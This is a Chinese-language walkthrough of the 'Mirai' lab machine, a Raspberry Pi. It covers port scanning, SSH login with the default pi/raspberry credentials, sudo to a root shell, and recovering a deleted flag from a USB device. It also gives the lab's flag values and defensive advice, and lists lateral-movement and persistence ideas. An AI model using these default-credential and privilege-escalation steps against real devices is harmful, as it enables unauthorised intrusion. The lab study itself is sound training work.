[Meachines] [Easy] Mirai Raspberry树莓派默认用户登录+USB挂载文件读取
字数 1124 2025-08-20 18:18:23
Mirai Raspberry树莓派渗透测试教学文档
1. 目标信息收集
1.1 初始扫描
使用Nmap进行端口扫描:
nmap -p- 10.10.10.48 --min-rate 1000 -sC -sV
扫描结果:
- 22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3
- 53/tcp: dnsmasq 2.76
- 80/tcp: lighttpd 1.4.35
- 1276/tcp: Platinum UPnP 1.0.5.13
- 32400/tcp: Plex Media Server httpd
- 32469/tcp: Platinum UPnP 1.0.5.13
1.2 Web目录枚举
使用Gobuster进行目录扫描:
gobuster dir -u "http://10.10.10.48/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50
2. 初始访问
2.1 默认凭证利用
发现目标系统为树莓派,尝试使用默认凭证:
- 用户名:pi
- 密码:raspberry
通过SSH登录:
ssh pi@10.10.10.48
成功获取第一个flag:
User.txt: ff837707441b257a20e32199d7c8838d
3. 权限提升
3.1 检查sudo权限
检查当前用户可用的sudo权限:
sudo -l
3.2 直接获取root权限
发现可以直接使用sudo获取root shell:
sudo /bin/bash
3.3 检查挂载设备
检查系统挂载的设备:
lsblk
df -h
3.4 读取USB存储设备内容
发现挂载的USB设备,读取其中的文件:
cat /media/usbstick/damnit.txt
使用strings命令检查原始设备:
strings /dev/sdb
成功获取root flag:
Root.txt: 3d3e483143ff12ec505d026fa13e020b
4. 漏洞总结
-
默认凭证漏洞:
- 树莓派系统保留了默认用户名(pi)和密码(raspberry)
- 管理员未修改默认凭证,导致攻击者可以直接登录系统
-
权限配置不当:
- pi用户被配置了无密码sudo权限
- 允许用户直接通过sudo获取root shell
-
敏感信息存储不当:
- root flag存储在未加密的USB设备中
- 设备挂载后可直接读取敏感信息
5. 安全建议
-
修改默认凭证:
- 首次使用树莓派时应立即修改默认密码
- 考虑禁用默认pi用户,创建新管理员账户
-
合理配置sudo权限:
- 避免授予用户无限制的sudo权限
- 使用最小权限原则,仅授予必要的命令权限
-
加密存储敏感数据:
- 对存储敏感信息的移动设备进行加密
- 使用LUKS等工具加密USB存储设备
-
定期安全更新:
- 保持系统软件包更新至最新版本
- 特别是SSH服务等关键组件
-
网络服务加固:
- 关闭不必要的网络服务
- 对必须开放的服务配置适当的访问控制
6. 扩展思考
-
横向移动可能性:
- 检查同一网络中的其他设备是否使用相同凭证
- 利用获取的权限扫描内网其他主机
-
持久化后门:
- 攻击者可创建隐藏用户或SSH密钥实现持久化
- 可植入定时任务或服务维持访问
-
数据泄露风险:
- 检查系统是否存储其他敏感信息
- 查找数据库凭证、配置文件等
通过此案例可以看出,即使是简单的默认凭证问题也可能导致系统完全沦陷,强调了基础安全配置的重要性。